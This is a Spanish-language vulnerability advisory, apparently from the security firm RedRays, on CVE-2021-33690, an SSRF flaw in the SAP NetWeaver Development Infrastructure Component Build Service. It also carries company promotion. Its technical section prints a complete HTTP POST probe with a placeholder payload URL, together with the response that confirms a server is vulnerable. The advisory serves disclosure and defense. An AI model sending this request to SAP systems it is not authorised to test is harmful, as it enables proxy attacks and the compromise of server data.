
[CVE-2021-33690] Vulnerabilidad de falsificación de petición del lado del servidor en SAP NetWeaver Development Infrastructure
[CVE-2021-33690] Vulnerabilidad de Server Side Request Forgery en SAP NetWeaver Development Infrastructure
Application: SAP NetWeaver AS Java
Versions Affected: SAP NetWeaver Development Infrastructure Component Build Service versions – 7.11, 7.20, 7.30, 7.31, 7.40, 7.50
Vendor URL: https://sap.com/
Bug: SSRF
Date of Public Advisory: June 1, 2023
Reference: [https://nvd.nist.gov/vuln/detail/CVE-2021-33690]
SAP Note: 3072955
SAP Approved Fixes: True
Status: analyzed and published
INFORMACIÓN DEL AVISO
Título: [CVE-2021-33690] Vulnerabilidad de Server-Side Request Forgery en SAP NetWeaver Development Infrastructure
Riesgo: Crítico
URL del aviso: https://redrays.io/cve-2021-33690-server-side-request-forgery-vulnerability/
Fecha de publicación: June 1, 2023
INFORMACIÓN DE LA VULNERABILIDAD
Explotable remotamente: Sí
Explotable localmente: No
Información CVSS
Puntuación base CVSS v3.1: 9.9 / 10 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)
DESCRIPCIÓN DE LA VULNERABILIDAD
Se ha identificado una vulnerabilidad conocida como Server-Side Request Forgery (SSRF) en varias versiones del
Servicio de compilación de componentes de SAP NetWeaver Development Infrastructure, concretamente 7.11, 7.20, 7.30, 7.31, 7.40 y 7.50.
Esta debilidad dentro del Servicio de compilación de componentes de SAP NetWeaver Development Infrastructure permite a un atacante,
que tenga acceso al servidor, ejecutar ataques de proxy mediante consultas especialmente diseñadas.
Las consecuencias de dichos ataques pueden llevar al compromiso total de datos confidenciales del servidor, afectando su accesibilidad.
Es crucial señalar que la gravedad de esta vulnerabilidad depende de si SAP NetWeaver
Development Infrastructure (NWDI) opera en la intranet o en Internet. La puntuación CVSS se ha calculado basándose
en el peor escenario, que supone que opera en línea.
DESCRIPCIÓN TÉCNICA
Para determinar si el servidor es vulnerable a SSRF, envíe la siguiente solicitud:
POST /tc.CBS.Appl/tcspseudo HTTP/1.1
Host: redrayssap:50000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
CBS=http://%YOUR_PAYLOAD%&USER=1&PWD=1&REQ_CONFIRM_DELAY=2000&ACTION=CONFIGURE
Si se recibe la siguiente respuesta, implica la presencia de la vulnerabilidad:
<?xml version="1.0" encoding="UTF-8"?><Cause>Could not connect to the CBS.</Cause>
Acerca de RedRays
RedRays es una empresa de ciberseguridad de primer nivel que protege los sistemas ERP contra actividades fraudulentas
internas y amenazas cibernéticas externas. Nos enorgullecemos de ofrecer soluciones de seguridad sólidas para grandes
corporaciones y proveedores de servicios gestionados que dependen de sistemas ERP importantes como SAP, Oracle y Microsoft.
Utilizando herramientas y estrategias avanzadas, supervisamos y controlamos proactivamente la seguridad en entornos SAP
extensos a nivel mundial.
Nuestro objetivo principal es cerrar la brecha de seguridad desde una perspectiva técnica y empresarial, garantizando las
operaciones fluidas de nuestros clientes y protegiendo sus valiosos datos. En RedRays, estamos comprometidos a mantener
los más altos estándares de seguridad mientras brindamos un servicio y asistencia extraordinarios al cliente.
Acerca de I+D de RedRays
La piedra angular de los logros de RedRays reside en nuestra unidad de investigación y desarrollo (I+D), especializada en
estudiar y analizar vulnerabilidades en aplicaciones corporativas esenciales. Nuestras iniciativas de I+D han obtenido
reconocimiento y admiración de las principales empresas de software como SAP, Oracle, Microsoft Dynamics e IBM.
Esta dedicación a la investigación nos permite anticipar amenazas emergentes y diseñar soluciones de seguridad personalizadas
que se adaptan a las necesidades de nuestros clientes.
Nuestro equipo está compuesto por profesionales experimentados con diversas habilidades que abarcan varios dominios de seguridad,
como la evaluación de vulnerabilidades, las pruebas de penetración, la gestión de incidentes y la inteligencia de amenazas.
Nuestro compromiso es realizar una investigación rigurosa y ofrecer soluciones vanguardistas para fortalecer los sistemas SAP
contra amenazas en constante cambio.
## Contacto RedRays
Para cualquier pregunta o más detalles, no dude en contactarnos:
* [GitHub](https://github.com/redrays-io)
* [Correo electrónico](mailto:[email protected])
* [Sitio web](https://www.redrays.io?gh)